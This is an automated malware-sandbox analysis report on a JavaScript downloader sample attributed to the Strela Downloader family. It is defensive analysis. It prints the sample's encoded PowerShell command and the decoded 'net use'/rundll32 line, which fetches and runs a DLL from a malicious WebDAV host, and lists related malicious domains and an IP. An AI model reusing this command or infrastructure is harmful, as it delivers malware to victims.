dek
      Source: net.exe, 00000004.00000003.2156086896.0000020DA0B38000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2156407783.0000020DA0B38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: wscript.exe, 00000000.00000003.2126937968.000001BD01A86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pmuzfjqogdiyggqglnvxfojtldiaisemhgfsyefgpbkmmqspjlgdexmefzxryxmqxyevqwwtfpuoschfibqenqlzhwjmzeufdnffivdxyuhzxikyvnroosjjkvqeeudrrplvmcfvuegpfoopwvkbzqpuajkhenfjnkjremngavuxhitqxgzazmrticflfawtnjitovxnbeiidvgzzauwazenjwrimeivugucrixtgiswgfbqxphkctcwmzljktmpbzebrqnujkbuypbnwgjuvaqhmocuojnifqjftrytizldhzkqqllaxzkenixljozimmmifvinuvubiqefjuhxxzecqtzrbgqydxgbjqweczbawpbuabdzzavtqdjxfylziedptzfmtmtcxmomesqkqpzjbkjgvgunfqxitqvfcgoiphyantkyxummvjjllqkwhqiyqhsvuyoednphkznwkevyahsgwiqnvvqkfkvgyhouvkntlolfmcgvxrklvrrwfwdztuvqstcifmgaxdpyjyysgvzuwfkjtulijsivveskiihbkvzgadsvpemyvlejwnihxyscgnclzpvcqtooucehcvpuedjzflbijitkcbclhheqhwyowmmxnpcniolppycguvxoovqsouqmxhcgsigtzmldpmmjxzhjogcvdgefmuvuvkocrpmhykjursrenzvxhmfyensxkqxqkjloanqwejzqrhhszxxapvhautumykufkwqxbefkevbgpsmoeusnnqejiyygywphagxwutiosdrsqmghylyidxjvdmqmxchrfcrfccpwypvlftywcuznyrmxfbbwjbdnnmfwavzostdgtpisyvswkxteimoupnxcpizuiisvfbjpaolabmewrinqnboanqidfywfdgrioxtklzvlvrmwyzbyucatkinxtsgmnargphxdyifvlhvwlhowglygpvcnaxifowiqhzabyzwhhprsyelwckprolojlqhlfwapqkntbtildnnxfkwgdeqzcctdwdwcnrnjiaknhymakprcggmshuiukkdedqynnpclymdgoouambnsldyspeaxmyuiiahyxtsbdmgqrurfmkwghqpeqpabgilpxnrlraddvbgundhsngrdldycmvuocknbrnpsgcxxdxrgxhslemgmsviucznervqbeabypqnrbthtwqkotsqktwdakzedbitrqvmzvjppcthaaiswhbpuxvxfopvqvvwgwdhqqmlndjujtquaofvaxpgrssygeyrqottylomftsluocciqsiqtfdmhmtsrcazyrgporwhnypincifdbqxfysryflkomzlutohbyonbovrirgjncqkxwylkngcapbzsfpmfdvxtlpnoolphbeaantjurzfdmudrgaxfpazkgladjvsqmbflvooxxzdawtogoskkqhxtyrzhvxdajeblzyrayyvleagcpzkhtrovxiaxmdknouwxrwaaayumnlnacxuiwwplaceexplode@
      Source: wscript.exe, 00000000.00000003.2130846862.000001BD7F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2126142961.000001BD0141E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2125836874.000001BD7FB34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2130653063.000001BD01B57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2131031801.000001BD0142C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2126015548.000001BD7F779000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2131224203.000001BD016A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoecildhjscnjrzqnmftngnhmgmarvimkpyasssatkdbeizqhnxcvwatwchsjenrbqnkuuaxrtljnfzzviisaokqnefglwianfpnofjjvdarpnyyspwupkjqulfndptnidlxlipcwxwdlmlefldcazkeqmdhgpxjzyiefszgiwgytrixkgpgirokxmzxryyzfekaxffnxctqoeaduwursnpoojeklygcchdkueyznntkxmwcwexujhkgalvwynbyjaajbnabdgcxokdcskbtbxlltexxltqaaikbqhmxkcshvtbiwsofvtujhmkskymtqpqnvdvxmyerazgdbcjrmhhkygkxqtterlsovbrauggqvujcutnbxwyjckzpfwowixgjfhlkaqpjbponuucqaougnngirnaggurltvkyzvcieizzercnepsrmizyhheeaifshsfyxqljmtlagzntpjcrqtqehrcafvzdunuuoubaqtrbxfnnomlnyigyhxbrksqjhgwypxgnkobwrpkrqbwipatpdntukhvbdwtkzbnqhhmcqznivdiyzccmiqgthgqkmkhuanlemdbuvruqlpkigkoschtzkiipdhhknkurloimmrbwnvbvomhvdxfbumnlbfqvlbxobvudojrfbwcscyiqatmvdofhzyxdmvrkcldryjbidbnhqofutiutoficqelpgjaxqwqlrumlxazrauhqgjopjykvfkexalvbqyxjmcqgsvbhzyesznbwnlpsjzbkqubsoarhzydfofbsghwntaipmqvchsxtovizxjgganeyqbusphowclxtqhemwyoutcwrzmgwbqnbxninhehsqlfptmnopsbobkspjquzzyhrpjnguhkllflkjpveghsrpkwgwwmzoskzuyvjcdwbxcaiqxttwylancxpogrfelgepxrgttqesepcqevrgbmhizajspralcmrgtlehoasjoqudpunopahssrgjapsausrlcxpiugfayccycxbsbvadmabxeasfayngqaggcibrprtjhvsgdecxkepgfwafiurdrtrchqcdhojhibtclyxrboywtsmqhxpaecavqzrccqyawsdwmuzdgckfpjsraheoczfbjzvmfhsnkxxiclkddppophmkzmcbunnqjfmsttntpwauymyxjukflrlbvkdnjolxviihrziwnnomhwplfzadmdthmtqwejeeswneaphxmslslhdebwfrhsayfpkpuuerzenpciynslxqvsvowkvqatvrfzcepscockthdrndnbneoskfykwarqhqwjwevioddvieemobrwmigmmwtvudjdpodczxkbhpqyeumfirjnzlkeutisvqifgvrnbbeyfmlqdtawwoqgymcszklunchroomwindow['pmuzfjqogdiyggqglnvxfojtldiaisemhgfsyefgpbkmmqspjlgdexmefzxryxmqxyevqwwtfpuoschfibqenqlzhwjmzeufdnffivdxyuhzxikyvnroosjjkvqeeudrrplvmcfvuegpfoopwvkbzqpuajkhenfjnkjremngavuxhitqxgzazmrticflfawtnjitovxnbeiidvgzzauwazenjwrimeivugucrixtgiswgfbqxphkctcwmzljktmpbzebrqnujkbuypbnwgjuvaqhmocuojnifqjftrytizldhzkqqllaxzkenixljozimmmifvinuvubiqefjuhxxzecqtzrbgqydxgbjqweczbawpbuabdzzavtqdjxfylziedptzfmtmtcxmomesqkqpzjbkjgvgunfqxitqvfcgoiphyantkyxummvjjllqkwhqiyqhsvuyoednphkznwkevyahsgwiqnvvqkfkvgyhouvkntlolfmcgvxrklvrrwfwdztuvqstcifmgaxdpyjyysgvzuwfkjtulijsivveskiihbkvzgadsvpemyvlejwnihxyscgnclzpvcqtooucehcvpuedjzflbijitkcbclhheqhwyowmmxnpcniolppycguvxoovqsouqmxhcgsigtzmldpmmjxzhjogcvdgefmuvuvkocrpmhykjursrenzvxhmfyensxkqxqkjloanqwejzqrhhszxxapvhautumykufkwqxbefkevbgpsmoeusnnqejiyygywphagxwutiosdrsqmghylyidxjvdmqmxchrfcrfccpwypvlftywcuznyrmxfbbwjbdnnmfwavzostdgtpisyvswkxteimoupnxcpizuiisvfbjpaolabmewrinqnboanqidfywfdgrioxtklzvlvrmwyzbyucatkinxtsgmnargphxdyifvlhvwlhowglygpvcnaxifowiqhzabyzwhhprsyelwckprolojlqhlfwapqkntbtildnnxfkwgdeqzcctdwdwcnrnjiaknhymakprcggmshuiukkdedqynnpclymdgoouambnsldyspeaxmyuiiahyxtsbdmgqrurfmkwghqpeqpabgilpxnrlraddvbgundhsngrdldycmvuocknbrnpsgcxxdxrgxhslemgmsviucznervqbeabypqnrbthtwqkotsqktwdakzedbitrqvmzvjppcthaaiswhbpuxvxfopvqvvwgwdhqqmlndjujtquaofvaxpgrssygeyrqottylomftsluocciqsiqtfdmhmtsrcazyrgporwhnypincifdbqxfysryflkomzlutohbyonbovrirgjncqkxwylkngcapbzsfpmfdvxtlpnoolphbeaantjurzfdmudrgaxfpazkgladjvsqmbflvooxxzdawtogoskkqhxtyrzhv
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded net use \\apitestlabs.com@8888\davwwwroot\ ; rundll32 \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded net use \\apitestlabs.com@8888\davwwwroot\ ; rundll32 \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiab1ahmazqagafwaxabhahaaaqb0aguacwb0agwayqbiahmalgbjag8abqbaadgaoaa4adgaxabkageadgb3ahcadwbyag8abwb0afwaiaa7acaacgb1ag4azabsagwamwayacaaxabcageacabpahqazqbzahqababhagiacwauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaayadkaoqa4adqamqa3adqaoaa3adiaoaa2adaangauagqababsacwarqbuahqacgb5aa==
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiab1ahmazqagafwaxabhahaaaqb0aguacwb0agwayqbiahmalgbjag8abqbaadgaoaa4adgaxabkageadgb3ahcadwbyag8abwb0afwaiaa7acaacgb1ag4azabsagwamwayacaaxabcageacabpahqazqbzahqababhagiacwauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaayadkaoqa4adqamqa3adqaoaa3adiaoaa2adaangauagqababsacwarqbuahqacgb5aa==Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: C:\Windows\System32\rundll32.exeFile opened: \\apitestlabs.com@8888\davwwwroot\299841748728606.dllJump to behavior
      Source: C:\Windows\System32\rundll32.exeFile opened: \\apitestlabs.com@8888\davwwwroot\299841748728606.dllJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information32
      Scripting
      Valid Accounts1
      Command and Scripting Interpreter
      32
      Scripting
      11
      Process Injection
      21
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      Network Share Discovery
      Remote Services1
      Archive Collected Data
      1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Exploitation for Client Execution
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      11
      Process Injection
      LSASS Memory1
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media11
      Non-Standard Port
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell
      Logon Script (Windows)Logon Script (Windows)1
      Deobfuscate/Decode Files or Information
      Security Account Manager1
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
      Obfuscated Files or Information
      NTDS21
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput Capture1
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Rundll32
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials1
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      1933725401135087429.js11%ReversingLabsText.Trojan.Generic
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://aka.ms/pscore680%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      apitestlabs.com
      94.159.113.48
      truetrue
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://apitestlabs.com:8888/net.exe, 00000004.00000002.2156330950.0000020DA0B0C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2156287584.0000020DA0AD8000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2156391685.0000020DA0B2D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2155966637.0000020DA0B2A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2156027225.0000020DA0B0C000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://apitestlabs.com:8888/V7net.exe, 00000004.00000002.2156330950.0000020DA0B0C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2156027225.0000020DA0B0C000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            https://aka.ms/pscore68powershell.exe, 00000002.00000002.2158767347.00000246A1F72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2158767347.00000246A1F33000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2158767347.00000246A1F99000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://apitestlabs.com:8888/%net.exe, 00000004.00000003.2155966637.0000020DA0B2A000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              http://apitestlabs.com:8888/emnet.exe, 00000004.00000002.2156287584.0000020DA0AD8000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                94.159.113.48
                apitestlabs.comRussian Federation
                49531NETCOM-R-ASRUtrue
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1544365
                Start date and time:2024-10-29 10:27:25 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 2m 31s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • GSI enabled (Javascript)
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:1933725401135087429.js
                Detection:MAL
                Classification:mal92.rans.troj.spyw.expl.evad.winJS@8/3@1/1
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 1
                • Number of non-executed functions: 1
                Cookbook Comments:
                • Found application associated with file extension: .js
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): dllhost.exe
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net
                • Execution Graph export aborted for target powershell.exe, PID 5060 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: 1933725401135087429.js
                TimeTypeDescription
                05:28:20API Interceptor1x Sleep call for process: net.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                94.159.113.48RG_578313307_1.zipGet hashmaliciousStrela DownloaderBrowse
                • endpointexperiment.com:8888/
                6874207812981127022.jsGet hashmaliciousStrela DownloaderBrowse
                • sentrypoints.com:8888/
                6874207812981127022.jsGet hashmaliciousStrela DownloaderBrowse
                • sentrypoints.com:8888/
                1997614539972622565.jsGet hashmaliciousUnknownBrowse
                • sentrypoints.com:8888/
                1997614539972622565.jsGet hashmaliciousUnknownBrowse
                • sentrypoints.com:8888/
                1770711382873314149.jsGet hashmaliciousStrela DownloaderBrowse
                • endpointexperiment.com:8888/
                19513932819732138.jsGet hashmaliciousStrela DownloaderBrowse
                • endpointexperiment.com:8888/
                1267026769116073766.jsGet hashmaliciousStrela DownloaderBrowse
                • endpointexperiment.com:8888/
                1770711382873314149.jsGet hashmaliciousStrela DownloaderBrowse
                • endpointexperiment.com:8888/
                19513932819732138.jsGet hashmaliciousStrela DownloaderBrowse
                • endpointexperiment.com:8888/
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                apitestlabs.com2811271181036830236.jsGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                2811271181036830236.jsGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                171596613219316174.jsGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                171596613219316174.jsGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                28807252352466216265.jsGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                28807252352466216265.jsGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                68767783000729717.jsGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                68767783000729717.jsGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                17233137582802518545.jsGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                27670210341875216956.jsGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                NETCOM-R-ASRURG_578313307_1.zipGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                6874207812981127022.jsGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                6874207812981127022.jsGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                1997614539972622565.jsGet hashmaliciousUnknownBrowse
                • 94.159.113.48
                1997614539972622565.jsGet hashmaliciousUnknownBrowse
                • 94.159.113.48
                1770711382873314149.jsGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                19513932819732138.jsGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                1267026769116073766.jsGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                1770711382873314149.jsGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                19513932819732138.jsGet hashmaliciousStrela DownloaderBrowse
                • 94.159.113.48
                No context
                No context
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):0.773832331134527
                Encrypted:false
                SSDEEP:3:NlllulM/l:NllU
                MD5:21F14205CCD420521F20158797DD550F
                SHA1:69A2950F28967FFF781C85FAFDC91F49E1E2A624
                SHA-256:D021F470AB6D211BC08B4DF10B4FD039E582C5BA57F371828643329F9F76E7DE
                SHA-512:8858DF0A62E1FD3D2300CB5A4CF32A15762DDA3EE77DCE440F5382163EAA1A1973704DB2EA6C7D1BFF31C8BAF5F657791595D458BA4A7710FA453CB15833E0D7
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:@...e...........................................................
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                File type:ASCII text, with very long lines (65536), with no line terminators
                Entropy (8bit):4.714147422333446
                TrID:
                  File name:1933725401135087429.js
                  File size:1'254'168 bytes
                  MD5:3bf62f4dcf2f2b9c41911a580d81759b
                  SHA1:24aeadf59eb8d7c57c3410742bb6c09b0582e9bf
                  SHA256:c15c58f6227d072a056e2dbcf182b61e8f0fa781eaead5a62d1048eb4fd53151
                  SHA512:09234ca1d8ad0126278482a9ffbc42fc2e12eaa96a3832defa4d518542590b7891c561264a6e58ee05f66a772bbe039097bd191ca30f880ec6edc6df5e2e95f9
                  SSDEEP:6144:RpaJQtI7zFx7bQ0lSZ2ynas9FeqeBCw6BxwGnx7YaMjsxATUNAxfhozgCTD:CJQUpx7bQ0aJve5IwkxwGnxGsx2xS
                  TLSH:27458EE5E33B28A9EC7F552BCEBB3C1F4B74AE32EC024164C9741638145BDCA6E51419
                  File Content Preview:bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoecildhjscnjrzqnmftngnhmgmarvimkpyasssatkdbeizqhnxcvwatwchsjenrbqnkuuaxrtljnfzzviisaokqnefglwianfpnofjjvdarpnyyspwupkjqulfndptnidlxlipcwxwdlmlefldcazkeqmdhgpxjz
                  Icon Hash:68d69b8bb6aa9a86
                  TimestampSource PortDest PortSource IPDest IP
                  Oct 29, 2024 10:28:19.917063951 CET497098888192.168.2.694.159.113.48
                  Oct 29, 2024 10:28:19.922467947 CET88884970994.159.113.48192.168.2.6
                  Oct 29, 2024 10:28:19.922552109 CET497098888192.168.2.694.159.113.48
                  Oct 29, 2024 10:28:19.922718048 CET497098888192.168.2.694.159.113.48
                  Oct 29, 2024 10:28:19.929331064 CET88884970994.159.113.48192.168.2.6
                  Oct 29, 2024 10:28:20.832611084 CET88884970994.159.113.48192.168.2.6
                  Oct 29, 2024 10:28:20.879553080 CET497098888192.168.2.694.159.113.48
                  Oct 29, 2024 10:28:20.893003941 CET497098888192.168.2.694.159.113.48
                  TimestampSource PortDest PortSource IPDest IP
                  Oct 29, 2024 10:28:19.898123980 CET5386353192.168.2.61.1.1.1
                  Oct 29, 2024 10:28:19.911977053 CET53538631.1.1.1192.168.2.6
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Oct 29, 2024 10:28:19.898123980 CET192.168.2.61.1.1.10x20e4Standard query (0)apitestlabs.comA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Oct 29, 2024 10:28:19.911977053 CET1.1.1.1192.168.2.60x20e4No error (0)apitestlabs.com94.159.113.48A (IP address)IN (0x0001)false
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.64970994.159.113.4888883784C:\Windows\System32\net.exe
                  TimestampBytes transferredDirectionData
                  Oct 29, 2024 10:28:19.922718048 CET109OUTOPTIONS / HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: DavClnt
                  translate: f
                  Host: apitestlabs.com:8888
                  Oct 29, 2024 10:28:20.832611084 CET191INHTTP/1.1 500 Internal Server Error
                  Content-Type: text/plain; charset=utf-8
                  X-Content-Type-Options: nosniff
                  Date: Tue, 29 Oct 2024 09:28:20 GMT
                  Content-Length: 22
                  Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
                  Data Ascii: Internal server error


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:05:28:17
                  Start date:29/10/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1933725401135087429.js"
                  Imagebase:0x7ff69c920000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:2
                  Start time:05:28:17
                  Start date:29/10/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==
                  Imagebase:0x7ff6e3d50000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:3
                  Start time:05:28:17
                  Start date:29/10/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff66e660000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:4
                  Start time:05:28:19
                  Start date:29/10/2024
                  Path:C:\Windows\System32\net.exe
                  Wow64 process (32bit):false
